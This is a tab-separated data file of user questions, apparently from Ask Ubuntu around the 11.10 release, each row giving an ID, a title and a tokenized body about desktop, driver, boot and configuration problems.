70736	connecting to windows7 share gives mount error	hi i am having trouble with ubuntu 11.10 to the workgroup containing windows computers . i am getting this message when i click on the workgroup i want to access from the ubuntu network interface : '' unable to mount location failed to retrieve share list from server '' how can i solve this problem ? output of sudo iptables -l : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination every time i try to connect to my windows shares using sudo mount -t cifs //ip_from_windows_pc/sharename /media/winshare -o username=windows_username , password=windows_password_for_user , iocharset=utf8 , file_ââmode=0777 , dir_mode=0777 it returns mount : can not allocate memory i have noticed that on the system event log in windows i also get this fault every time i try to connect with the ubuntu computer the server was unable to allocated from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations .
70747	how to migrate from evolution with maildir to thunderbird	after upgrading to 11.10 evolution convert at first start the my mails into the maildir format . now i want to change my mail program to thunderbird . is there any migration guide ( maybe a official one ; since this migration many user are doing , since the default changed ) or similar for this . i found only instruction for the old mbox format .
70748	can i install gimp 2.7 ?	i am trying to install gimp 2.7 on my ubuntu 11.10 64bit . i used the following : sudo add-apt-repository ppa : matthaeus123/mrw-gimp-svn sudo apt-get update sudo apt-get install gimp this issue is that this works fine for the standard 32bit os , but when using 64bit gimp does not upgrade and there is no force upgrade option . even running sudo apt-get upgrade , only upgrades gimp-data , but not the actual gimp program . the process also remove gimp 2.6 , but no upgrade available . is it possible to install the i386 version easily , or will this cause other issues for me and defeat why i am using 64bit on this pc . any ideas would be appreciated .
70750	how to get bash to stop escaping $ during tab-completion ?	i have this on the command line : ln -sf $ pwd/wine- and then i hit tab to complete the filename . in earlier versions of ubuntu , this worked just fine to complete the wine- filename ( and as a side-effect $ pwd would be expanded at that time ) . but now it turns it in to ln -sf \ $ pwd/wine- which is n't what i meant at all and does n't complete anything as the file does not literally start with $ . how do i get completion back to the less broken behaviour ? set tells me these are my current settings : bashopts=checkwinsize : cmdhist : expand_aliases : extquote : force_fignore : hostcomplete : interactive_comments : progcomp : promptvars : sourcepath shellopts=braceexpand : emacs : hashall : histexpand : history : interactive-comments : monitor
70756	unity gone , gnome took over	i am running ubuntu 11.04 . today i booted up my machine and logged in as usual but found gnome running instead of unity . i saw a similar thread where someone suggested using unity -- reset this gave the following errors : paul @ paul-ubuntu : / $ unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values unity-panel-service : no process found backend : gconf integration : true profile : unity adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 initializing bailer options ... done initializing detection options ... done initializing composite options ... done compiz ( opengl ) - fatal : no valid gl extensions string found . compiz ( bailer ) - info : ensuring a shell for your session paul @ paul-ubuntu : / $ can not register the panel shell : there is already one running .
70758	please help me kill nautilus on root window	i am running ubuntu 11.10 and do not want nautilus to start running at all . there used to be a way to kill it via gconf-editor . does anyone have the secret recipe ? thanks
70760	how do i place a folder onto the launcher ?	there is a folder i need pretty often , and i would like to have a button on the launcher for it . how can i make it ?
70762	software center does n't launch , and no software visible in unity	on a fresh install ubuntu 11.10 . can not open the software center , when i launch it by command line it display me an error : `` erreur de segmentation '' . also i can not access to my software installed thru unity , no software listed and no possibility to search for a software installed ( example thundebird ) . the software update can be run but are not updated . i neet to do a `` sudo apt-get upgrade '' for having the latest updates availables in the update software . it seems that 's these problems are connected because they appeard at the same time . after few use of the fresh install ( shutdown and restart ) . i 'm desperate ... my system is fresh it should run correctly . i also try to uninstall software update and software center en reinstall them and still the same problem ... .. please help !
70763	splash screen resolution is poor	how come when i boot from cd or usb drive to install ubuntu , the resolution of ubuntu splash screen is perfect , at full screen resolution of 1920x1080 - however , after installing the system along with the latest nvidia drivers , the logo looks nothing like when booting the live cd or live usb . anyone know a fix to get 1080 for plymouth ? ( boot logo/splash )
70765	brightness problem on dell latitude d820	after period of inactivity screen went dim , and eventually got black , it could n't get to previous state . when mouse is moved screen from black came to minimum brightness state . combination of fn and brightness button fixed this , but on very strange way . every time i pressed button to increase brightness it came more bright but with next push of button went to minimal brightness . so , every second push of button puts screen to minimum . gremlins ?
70768	how to update bios of asrock h67m motherboard ?	the problem is that i need to boot from a live usb , but the motherboard does not recognize the usb , and the methods to enter bios set up ( pressing f2 or del ) do not work at all . so i guess the bios should have been corrupted . on the other hand , the bios is written for windows . so i really feel being trapped and appreciate any help .
70771	what can i do to speed up my internet connection ?	i tried doing this : http : //www.hitxp.com/articles/software/ubuntu-fix-slow-wireless-internet-connection-speed-upgrading-11-04-natty-narwhal/ and to check if it was bufferbloat but my internet is still so slow . i have a 'sony vaio i3 core model : vpceb23fm' what can i do to speed it up ?
70775	how can i make the firefox totem plugin open vlc instead of totem when opening an online video in a new window ?	until 11.04 the firefox totem plugin offered to open the video in vlc , now it offers to open it in totem . how can i change it back to vlc ? note : i do not want to install the vlc plugin nor do i wish to automatically open vlc when watching a , say , .avi video .
70781	slow internet with a dell inspiron 1525	compared my internet speed against a windows laptop via speed test and noticed a huge difference . ubuntu 11.10 ( up : 0.92mbps down : 0.92mbps ) windows 7 x64 ( up:6.84mbps down : 1.07mbps on windows ) info as below : i have a dell 1525 inspiron , intel wifi card ( a/b/g ) only . wireless router only supports b/g . more info below : lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11abg essid : '' awesome '' mode : managed frequency:2.412 ghz access point : 00:24:17:80:42:91 bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=40/70 signal level=-70 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:41 invalid misc:1149811 missed beacon:0 clearly the n channel bug would not be the issue here . also tried the ipv6 disabling solution which also did not work . please let me know if any other info might be needed . have started using linux only about a week back . cheers , desu
70784	how can i enable compose key ?	i had a compose key set to right super ( a.k.a . windows ) key using gnome keybindings . after upgrading , i seem to have lost the compose key function . where can i enable compose key ? i ca n't find any option under system settings > keyboard .
70786	hp dv6000 nvidia 7400 external monitor	external monitor is working during upstart , when login screen appears , the external monitor goes black . the screen settings menu does not detect the external monitor . the nvidia binary graphics device driver does not detect it either . i have been forced to watch doctor who on a tiny laptop monitor , in absence of sonic screwdriver , please help ! : d nvidia fault message below : unable to load x server display configuration page : failed to query noscanout for screen 0 .
70791	must close and open laptop lid to recover from screen turn-off on an acer aspire 5740	i have an acer aspire 5740-5780 laptop with ubuntu 11.10 . i do n't have the more common problem of the black screen on boot . rather , under system settings ... , in screen , under brightness , with the `` turn off after '' set to x number of minutes , the screen will indeed turn off at the designated time , but the screen will not come back when i press a key . however , i am able to shut and re-open the lid , then the screen will recover . any ideas on how to fix to this ?
70792	where 's the screen to enable/disable 3d visual effects ?	i just upgraded from 11.4 to 11.10 and my desktop effects ( like wobbly windows ) are gone ( they are still enabled in the compiz-config thingy ) . so i 'm looking for the window/screen that would let me enable/disable visual effects , but can not seem to find it . where the heck is that screen in oneiric ? thanx .
70794	did they forget about the 'restart ' button , or was it just not important ?	seriously , from the top-right corner button , i have logout , suspend , hibernate & shutdown but shockingly no restart . what happened to the restart button ?
70798	is there a tweak to show a percentage in the battery icon ?	i 'm use to not having to click on the battery icon to see what my battery percentage is , like on my android phone . is there a tweak/mod/hack to do this on ubuntu 11.10 ?
70809	help convert console command to right-click command	i use this console command to automatically send all files in some directory to the jar file , catch the output of that jar file and finally create new files from the output . here is the command for i in `find . -type f -name '*xml'` ; do java -jar `` ~/grabbertty.jar '' $ i > $ i.txt ; done now , i know how to make nautilus-script which will be called via rightclick- > scripts . what i do not know is how to convert this command to say `` convert all files in currently selected directory '' . currently selected directory is a directory where i right click . anyone can help . thanks .
70811	after 11.10 update and compiz install , desktop vanished - only functional keys are ctrl-alt-del	yesterday i updated from 10.04 to 11.10 and ended up with the unity desktop . i was slowly getting the hang of it but wanted to make the launcher icons smaller . i installed compiz per the help page , ran it , but could n't figure out how to change the icon size . i closed the application and everything on the desktop vanished . i tried pressing the meta key twice ( windows key according to the help page ) but nothing happened . same for the alt keys ( both of them ) and the menu key . the only key combination that did anything ( that i could find ) was ctrl-alt-del which allowed me to log off and then i was able to shutdown . what do i do to a ) recover a working interface or b ) startup in something other than unity ?
70812	is it normal that the installation takes more than 2 hours ?	i 'm new to ubuntu and i 'm trying to install it on my boyfriend 's laptop . but it 's been more than two hours since i 've started the installation and now i 'm stuck on `` configuration du systă¨me de destination '' ( do n't know what it is in english ... i 'm installing the french version ) . what can i do ? should i reboot the computer ?
70815	ca n't login into gnome shell , running it always shows fallback mode	edit : i 'm running vmware 7.1 currently . i 'm having major issues getting gnome3 working on ubuntu 11.10 . using synaptic , i 've installed the following : gnome-shell and it 's dependencies gnome-shell-extensions gnome-tweak-tool gnome-shell-extensions-user-theme this is what my desktop looks like . i go to applications - > other - > advanced settings , select shell extensions from the list and the entire pane on the right is just blank . clicking on theme in the list populates the pane on the right , but next to `` shell theme '' there is an exclamation mark where if you hover over it , it says `` could not list shell extensions '' . i believe i 'm missing a critical step in this process somehow , even though i 've trolled around on the interwebz for the greater part of 4 hours trying to figure this thing out . any help that you could offer would be appreciated . thanks . for the record i 've created ~/.themes and placed a theme in there per the instructions listed at http : //gnome-shell.deviantart.com/gallery/28081982 # /d47vmgg .
70822	ethernet-wifi bridging with 11.04	i 'd like to set up a bridge between a wireless subnet and an ethernet subnet ( actually just one client , a dvd player with absurdly poor wireless ) . that is , the wireless network is the `` real '' network , to which clients get to the router and gateway , and i want the wired subnet to transparently get through the bridge machine to the wireless subnet . ( i 'm not a networking person so i do n't know whether i 'm saying that right . ) there are two packages i can find that i think are relevant : bridge-utils parprouted i 'm not sure which of those i need , or if i need both . ( i guess i can just install them and see if it 's obvious . ) is this an easy thing to set up ? it just occurred to me today that it must be possible , but i have n't found any ( recent , at least ) how-to 's on the subject . edit — oh durr i just found this reference which tells me a lot about the bridge-utils stuff ( and the deal with the ap not wanting to handle alien-looking packets makes sense ) . so maybe that second thing is what i want .
70825	window manager selection not working for one user	for only one user on the system , the window manager selection in the login screen of ubuntu 11.04 is not working . irrespective of what i select ( i have window maker also installed ) , unity is the one that starts up for that one user . what files in that user 's home directory could be causing the problem ? what log files can i look at to debug the problem ? i blew away .gconf and .gconfd . still no luck . the difference between the problem user and other is that that user 's home directory used to exist under ubuntu 10.10 . i reinstalled ubuntu 11.04 on a different partition and created a new user with the uids same as what it was under ubuntu 10.10 . i.e. , i am using the ubuntu 10.10 home directory for that user under ubuntu 11.04 . the other users were created newly under ubuntu 11.04 .
70829	gedit-r-plugin not showing up in plugin list in gedit	i installed the gedit-r-plugin through synaptic and in the past it has worked great . i ca n't seem to even get the plugin to show up in the preferences - > plugins list after updating to 11.10 . i 'm guessing this is because of the switch to gtk3 but i 'm at a loss for what to do . what can i do to resolve this and get the ability to work with r nicely through gedit again ?
70832	i messed things with ccsm	well , i 'm a newbie . i installed 11.10 , and set a number of things till perfection . then i decided to make my os `` cool '' by using ccsm , guess what ? ? `` disappear they have '' symptoms : - i cant see the toolbar that used to be in the left ; alt+f2 does not call the terminal ; ctrl+shift+n creates a folder in the desktop ( i think it used to do something different ) ; the icons on the top-right disappear ( all ) ; i can now see file , edit , view , go , bookmarks , help on the top left ; the change of workspaces shows like flipping the screen ; sooo , i can not get to the terminal to call ccsm and try to fix it ! i tried login with a guest user and things were much worst , the screen would have an od behavior with parts of it disappearing during use . i can still login by choosing ubuntu2d , where things look normal ( but with no effects i think ) how can i get my normal ubuntu ( rather than ubuntu 2d ) to work again ? ( not sure but i think whatever i did had something to do with me messing with `` ubuntu unity plugin '' ) thanks ! ! !
70833	installation mythbuntu 11.10 on 64bit toshiba protege	started iso cd and installed ... then asked to restart from cd ... locked with instructions to chkdsk ... followed these instructions ... no jot ... also : can no longer access bios ... i want to get this running on 3 computers this one - see above i have 11.11 running on an old toshiba 32bit , with a few issues ... persevering old lenovo thinkpad ... all installer , but , will not boot ... i seem to have lost the bootstrapper ... followed instructions from forum ... problem is most likely my lack of knowledge rather than quality of instructions/information ... can you help .
70834	updated 11.04 to 11.10 of ubuntu , and now the ubuntu software center does not run properly	software center comes up as an all grey screen with nothing inside the screen . how to fix ? ? ?
70840	ati/amd catalyst 11.9 drivers ?	i 'm thinking of downloading the drivers stated in the title but i 've `` heard '' that it 's not compatible with the latest ubuntu version . is that true ?
70841	how to revert an update ?	the latest xorg update was a big regression for me on a dual display setup . is there a simple way to revert to the previous version ? i 'm on lucid lynx .
70846	how to make guest sessions start with unity 2d by default ?	my pc does not have enough resources to run two accounts in unity 3d . when i open a guest account from an already started session , it uses unity 3d by default . how do i change that ?
70847	front audio jack not working on sigmatel stac9274d	firs of all , i want to say that this problem seems to be the same as the one here getting sigmatel stac9227 front audio jacks to work . but seeing as it was n't solved , i 'm posting it . i just installed ubuntu 11.10 and am unable to output sound through the front audio jack , while the rear jack works fine . i am using the integrated audio device that comes with the intel d975xbx2 motherboard . i have tried a few workarounds but without success . possible models for my codec : stac9227/9228/9229/927x ======================= ref reference board ref-no-jd reference board without hp/mic jack detection 3stack d965 3stack 5stack d965 5stack + spdif 5stack-no-fp d965 5stack without front panel dell-3stack dell dimension e520 dell-bios fixes with dell bios setup volknob fixes with volume-knob widget 0x24 auto bios setup ( default ) i tried adding a line in the alsa configuration file `` /etc/modprobe.d/alsa-base.conf '' options snd-hda-intel model=xxxx and tried all the models above , and it has n't worked . i am out of ideas . these are some relevant outputs that can help with finding the problem . cat /proc/asound/card0/codec # 2 | grep stac codec : sigmatel stac9274d device : name= '' stac92xx analog '' , type= '' audio '' , device=0 device : name= '' stac92xx analog '' , type= '' audio '' , device=0 device : name= '' stac92xx digital '' , type= '' spdif '' , device=1 lspci -vv 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) subsystem : intel corporation device 0419 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 44 region 0 : memory at e3200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : stac92xx digital [ stac92xx digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 edit : alsamixer i just tried the terminal application alsamixer . rechecked the mute state of the headphones output with every different option in the alsa-base.conf file and it still is n't working .
70848	gnome-terminal does n't close at end of ssh session	i have defined in gnome-terminal that it closes at end of shell . when i press control-d or i execute exit , the terminal closes . but if i open the ssh session with gnome-terminal -x ssh server and i execute reboot in the ssh session ( to reboot the remote server ) , it hangs and it does n't close . what 's happening ? this worked to me before but i have to reinstall my ubuntu ( in local ) and now gnome-terminal does n't close itself when ssh session ends .
70854	how to remove a specific folder from the ubuntu search ?	is there a way to block a specific folder 's files from showing up in the unity search ?
70858	unity `` dash home '' icon completely missing	in 11.10 the icon for the `` dash home '' button is missing , the generic question mark icon shows . how do i fix this ? it happened after i installed and uninstalled an icon theme in synaptic ( breathe ) .
70859	external monitor via hdmi does n't work with an envy 14 with hd5000m ati	i have a peculiar problem with the hdmi connection on my hp -envy . here are the instructions i followed . installed 11.10 uninstalled fglrx proprietary drivers . followed methods this . http : //asusm51ta-with-linux.blogspot.com/ and this http : //ubuntuforums.org/showthread.php ? t=1744188 to get the switchable graphics working . so thats great , system boots up and am able to switch between the graphics . but there is no output to my external monitor connected through hdmi . the issue is while booting up , the display switches to external monitor when the `` ubuntu ... '' splash screen shows up , but then it goes back to laptop monitor and i can not get it back to the external monitor . the same thing happened while actually installing ubuntu . can anyone advise me on this . does anyone have an hp envy connected to external monitor through hdmi on ubuntu ?
70860	will gnome online accounts ever support ubuntu one ?	like the title of the question says , is ubuntu one integration with gnome online accounts on the roadmap for ubuntu ?
70863	errors upgrading to ubuntu 11.10 from 11.04 ( error adding /etc/ssl/certs/*.pem )	i am getting the below while upgrading from 11.04 to 11.10 using do-release-upgrade ( i 've seen this too when i tried using update manager sometime back )
70866	how to reset unity to defaults ?	i tried to activate some compiz effect via ccsm ( i think wobbly windows ) and compiz crashed and froze up the screen . so i used the control+alt+backspace keystroke to force logout . then i logged back in . unity was n't there , just a ( non-unity ) panel at the top with file , edit , and the like . i was able to pull up a terminal and launch ccsm , only to find almost all settings wiped out . i turned everything back on that i thought should be on , but i do n't know if i got everything . also , now whenever i open up a non-maximized window , it opens up in the top left corner with the title bar behind the unity panel . so what i need is a list of everything that needs to be on in ccsm , and a way to get windows to not open in the corner , preferably without having to reset unity or compiz .
70867	how to customize/label the hard drive icons in the launcher	is there any way to change the hard drive icons in the launcher since i have 4 total hard drives and they all look the same . i was wondering maybe to add the label of the hard drive ( if exists ) to the button someway or a custom icon for each . that way i know which icon is which hard drive . an image to give an idea of my problem : as you can see , the last 4 icons look the same .
70868	how do i install gimp 2.7 on ubuntu 11.10 64 bit ?	i looked at this question how do i install gimp 2.7 ? , but it was n't helpful , as its solution was to just install gimp 2.6 . do i need to compile it from source in some way ?
70873	automounting partitions xubuntu	i 'm new to this linux stuff and installed ubuntu but did n't really like the unity setup and had some issues so switched to xubuntu . however , i want my partitions to automount on boot . i tried using ntfs and pysdm or whatever it 's called . any help is greatly appreciated
70875	hide grub menu and keystroke to reveal	how do you have the grub appear on a key combination , but have windows boot default . i 'm running ubuntu 11.10 and grub 2.0 . here is my current /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' quiet vga=769 '' thanks ! and here is my /boot/grub/grub.cfg http : //pastebin.com/hbdbe8xz
70876	can no longer boot into windows 7	i have a laptop on which i had windows 7 installed on . later i installed ubuntu 11.10 on a new partition ( sda7 ) . somehow it magically moved to sda6 and the grub loader freaked out . then i booted with my live cd of ubuntu and downloaded ubuntus own boot-repair and ran the recomended program . when i now restarted i could boot into ubuntu but not windows , it just says : unknown filesystem grub > edit i trind to run the ubuntu live cd and install it and i no longer get the option where it asks if i want to install ubuntu alongside windows . it says that no other operativesystem wap found . but if i mount c and my other partitions , all files is still there . more info here http : //paste.ubuntu.com/716521/ edit2 i managed to get my computer to recognize windows 7 again and i updated grub via boot-repair and there it is on the boot menu . now the only problem is that when i trying too boot it , it says : `` unknow filesystem '' and then the grub resque thing . http : //paste.ubuntu.com/719930/ am i on the right path ?
70877	battery critically low at 85 % ?	i , along with many others , have been experiencing a problem with our ubuntu 11.10 installations on our battery-powered laptop devices : the computer misreads information from the battery , so it thinks the battery will only last a few minutes . i get a critically low message ~85 % battery level . can someone help me ? here is the link to the whole situation showing all the details and terminal messages on the ubuntu forums : http : //ubuntuforums.org/showthread.php ? t=1865832
70878	can audacious music player edit metadata of music ?	i 've been trying to find an alternative to banshee , and right now , i 'm using clementine . it really is a great music player , but it just has too many features for me . all i listen to are soundtracks from movies and games and such , so all of the extra radio , podcast , lyric finding , etc . stuff is useless . i 've seen that audacious is an extremely light and fast music player that seems to be simple . i 'm going to try it out , but i need one essential thing : a metadata editor built in . i love the fact that banshee and clementine both have one , so it makes it extremely easy to edit my music . does audacious have a metadata editor , or no ? i 've been trying to find information on their website , but it seems as if their website is broken .
70879	partition is reported to be full , but i can not `` see '' any culprit files	so here 's the deal : -- df reports 100 % usage on the partition hosting my /home directories ( and only those ) -- tools that use du ( a la baobab or xdiskusage ) report that the excessive space consumption is clearly related to my user . -- tools that use du do not , however , seem to be able to locate any files that are the culprit . for example , xdiskusage shows my profile taking up > 260gb but only about half that amount of data actually in files ( the rest is shown as just empty space ) . -- running du on cli just shows what i 've described above : my user 's ~/ folder is consuming like twice as much disk space than it actually has files inside of it . and my favorite : -- this appears to be correlated with uptime , as though some process is slowly filling the partition with data until the drive is full . and when i reboot -- pooof ! tons of free space . is there an introspection tool that 'd let me ascertain , e.g. , what process is writing to disk at any given time ? any suggestions ?
70881	display brightness	i remember that in windows you could put a different display brightness when i was on battery in my laptop , and a different one when i was connected to the ac source . this can be done in ubuntu without having to change manually the brightness ? thanks 4all !
70882	expand variables in upstart script	i have written several upstart scripts to start transmission-daemon for several users . the script is this : start on ( local-filesystems and net-device-up iface=eth0 and runlevel [ 235 ] ) stop on runlevel [ 016 ] kill timeout 50 respawn env user=user env pidfile=/var/run/transmission-user.pid script daemon= $ ( which transmission-daemon ) || exit 0 configdir=/home/ $ user/.config/transmission-daemon exec start-stop-daemon -- start -- quiet -- chuid $ user -- pidfile $ pidfile -- make-pidfile -- exec $ daemon -- -f -- config-dir $ configdir -- logfile $ configdir/daemon.log end script post-stop exec rm -f $ pidfile i would convert this : env user=user env pidfile=/var/run/transmission-user.pid to this : env user=user env pidfile=/var/run/transmission- $ user.pid but upstart does n't allow . i can do it if i move those lines to the script section : script user=user pidfile=/var/run/transmission- $ user.pid ... end script but in this case , the pidfile , in post-stop section , is empty . is there any way to do this ?
70883	how do i install python pandas ?	i 'm trying to install pandas ( python package ) on ubuntu . i ca n't find it in the repos . is there a package repo for this or do i have to install from source ?
70887	replace the xubuntu 11.10 splash screen	i 'd like to be able to replace the xubuntu 11.10 splash screen that i see on boot with another splash screen that does not have an indicator meter of progress . is this possible ?
70888	installation of broadcom driver has failed on a dell inspiron 1545	i just installed 11.10 on my inspiron 1545 laptop . when i was running it off my flash drive the driver `` broadcom sta wireless driver '' installed fine and i could use my wifi . after i installed it onto the computer the driver could not install it just says sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i tried looking for a fix but nothing i could find worked with the new ubuntu . the log says : 2011-10-22 22:42:18,605 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-10-22 22:42:18,636 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2011-10-22 22:42:18,691 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted thanks in advance .
70890	how can i solve the horrible feud between compiz 's wobbly windows and gnome ?	i 've been a fan of compiz 's wobbly windows since i discovered them in 10.04 . it 's always been one of the first things i enabled . i still have it memorized : appearance preferences > visual effects > extra . { i stole the below image from here } but i discovered gnome 3.2 yesterday . and you ca n't take me away from it no matter how hard you try . of course , i wanted my wonderful wobbly windows to work with gnome ... but that turned out to be really hard . i tried the obvious compiz -- replace , but to no avail . it simply kills gnome and does n't start anything , leaving my windows stranded , borderless , on the screen , with no way for me to logout or shutdown . i installed all { yes , all } compiz settings manager-thingies . i changed settings once , twice , and four hundred times . of course , unity tried to grab me by letting me use compiz 's wobbly windows freely and easily . do n't worry , gnome , i wo n't leave you ! i 've now spent countless hours trying to get the two best things in the universe , gnome and wobbly windows , to work with each other , but nothing works . i 've done over 25 bing searches , and i 've installed countless bytes ' worth of compiz and gnome settings managers , but to no avail . how can i get my new best friend , gnome 3.2 , to work with my old best friend , wobbly windows ? i 'd even be willing to accept a non-compiz wobbly windows solution , but i do n't think anybody makes wobbly windows except compiz .
70897	how can i configure external applications used for downloads in chromium ?	i subscribe to emusic and would like to be able to browse and download songs using chromium . their downloads are implemented using a special xml file with an .emx extension that can be opened using banshee . i can not find a way to configure chromium to open these downloads with banshee . it does detect the content type ( application/vnd-emusic-emusic_list ) . is there any way to configure the external applications chromium uses for downloads with a particular extension or content type ? ( i know that i can use banshee emusic extension to browse but i would like to be able to use a standard web browser as well . in firefox i can do this easily in the applications tab in preferences . )
70904	inconsistency between folder in hdd and ubuntu one folder	i have a folder in my hdd which has 2.4 gb . ubuntu one says the sync is done , but the folder in the ubuntu one service only has 466 mb , someone explain me that ?
70905	shift switcher versus kile shortcut	when i use the shift switcher generates conflict with shortcut keys kile . i can not access the menu by pressing alt . how do i use the shift switcher no conflict with kile ?
70909	how to setup dns server on local network	im having a ubuntu 11.10 desktop system , how can i configure the bind server to resolve as the following : i should be able to use google 's public dns for the internet www.rootserver.com should resolve to my computer www.wifi.device should resolve to 192.168.1.7
70910	how can i adjust the transparency of the status bar ( top panel ) ?	the status bar ( by default ) at the top of your screen with the icons off to the right , date , user name and other computer options . how can i make that bar transparent , like it is when dash activated ( as seen in a screen below ) ? instead of having this :
70920	t61 lenovo laptop overheats - is there a fix ?	my lenovo laptop is overheating since i installed ubuntu 11.10 . does anyone know of a fix/cause for this problem ? thanks !
70926	x-server does n't start properly : no window boundaries , close buttons , or unity sidebar	good afternoon , earlier today i removed libjpeg ( because i felt it needed to be reinstalled to fix this ghostscript related error ) . unfortunately it removed a bunch of software along with libjpeg . when i rebooted , i had nothing . so i went to tty2 and installed ubuntu-desktop . after reboot , x still does n't start by default , i have to switch terminals and run it manually . unfortunately , it does n't load the boundaries of the windows , alt-tab does n't work , and the minimize/maximize/close options are unavailable . how do i finish restoring my ubuntu 11.10 x86_64 os ? thanks for all suggestions , alec taylor
70930	play , pause , next , stop on keyboard - how to set which app use it ?	i have i keyboard with play , pause next back , stop on right of the numpad , but sometimes it does not goes to the right app . i got my clementine player open , a hit play ( keyboard ) , and then banshee open from nowhere a play something . i go in clementine settings and change to normal keyboard and it worked , but randomly or i do n't know why it stop going to clementine , then i go in clementine 's settings , change nothing only click `` close '' and the keyboard is back with clementine for a while . is clementine the problem or ubuntu not sending the key to the right app ? i use 11.10 ( 11.04 was ok but i was not using clementine so maybe its clementine ) thanks
70931	how to set right alt to work as a win ( super ) key ?	although there are lots of different articles how to change the left alt to simulate win , i want to map the right alt to do so . i want to move to 11.10 , i fall back to unity 2d and dont have a win key . i kennot even get the keycode in the articles i found ... any help or good suggestions ?
70933	system freezes when using vgaswitcheroo	i 'm using hybrid graphics on my notebook . it has an integrated intel and a discrete radeon hd 6650m graphic card . when i want to switch to discrete card , the screen freezes and i ca n't do anything . i chowned /sys/kernel/debug/vga_switcheroo/switch to my username . but when i use the following command , the system freezes after restarting x : echo ddis > /sys/kernel/debug/vga_switcheroo/switch my question is : how can i switch to the radeon card ?
70935	lvm allocations change after restart	i have been running ubuntu as a dual boot with xp on a caddy . i also run xp in a virtualbox guest . my last upgrade to natty worked fine and automatically mounted all of my internal drives ( 13 partitions ) . i have upgraded to 11.10 and , because it does n't automatically mount all of my drives , i am having all sorts of problems . if i cold boot the machine , fdisk -l tells me the allocations to sda , sdd etc but , if i restart ( warm boot ) , all of these allocations change . what was on sda is now on sdc and sdc is now sde and so on . i want to ( am running ) virtualbox with the vdi on what is sdc1 at boot up . at the moment , if i set up fstab to auto mount sdc1 with these settings and then restart , i get all sorts of errors . is there any way to force lvm or whatever to maintain the allocations through a restart ?
70937	what additional software should i install for a macbook ?	i 'm new to ubuntu , and i 've installed 11.10 it on my 2006 macbook . what else should i install to make it complete ? i 'm talking about drivers and the like . is there a complete package i can download somewhere ? thanks .
70938	how do i disable the mac startup sound ?	the `` bong '' sound macs make when starting up are very annoying . although they serve a purpose as a post confirmation , i 'd rather not have it alert everyone in the room . there are ways to either quiet or turn off the sound in os x , but that 's not something i currently have access to , nor am i willing to install . is there anything i can do ? macbook 2006
70940	not able to get visual effects in 11.10	i am new to ubuntu . i recently installed the latest version 11.10.i am not able to get any kind of visual effects like wobbly windows etc in this version.i have this driver intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) .
70942	how can i change mouse cursor size ?	i 'm using 11.10 and i 'd like to change mouse cursor size more bigger . how can i do it ? i can not find any settings of mouse cursor size .
